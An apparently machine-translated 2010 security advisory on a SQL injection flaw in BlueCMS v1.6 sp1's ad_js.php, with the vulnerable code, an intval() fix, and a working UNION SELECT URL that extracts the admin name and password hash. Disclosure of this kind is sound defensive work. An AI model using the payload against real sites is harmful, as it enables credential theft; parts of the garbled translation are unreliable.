BlueCMS v1. 6 sp1 ad_js.php SQL injection vulnerability-vulnerability warning-the black bar safety net

2010-09-14T00:00:00
ID MYHACK58:62201027862
Type myhack58
Reporter 佚名
Modified 2010-09-14T00:00:00

Description

Affected version:

BlueCMS v1. 6 sp1

Vulnerability description:

The defect file: ad_js.php

Vulnerability causes: the 1 2: $ad_id = ! empty($_GET['ad_id']) ? trim($_GET['ad_id']) : "; //root directory of the other files are doing a very good filter, the logarithm of the font variables almost always use intval()to do the limiting, but missed this file, but just use trim()to remove the head and tail space..

1 9: $ad = $db->getone("SELECT * FROM ". table('ad')." WHERE ad_id =".$ ad_id); //directly into a query

<*reference

> http://www.wooyun.org/bug.php?action=view&id=1 4 1

*>

Test method:

[www.sebug.net] This site provides program(method)may carry offensive,for security research and teaching purposes,at your own risk!

http://localhost/cms/ad_js. php? ad_id=1%20and%2 0 1=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1

Right click View Source to get the return data.

SEBUG Safety recommendations:

SEBUG temporary solution: $ad_id = ! empty($_GET['ad_id']) ? intval($_GET['ad_id']) : ";

Manufacturers patch:

The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version: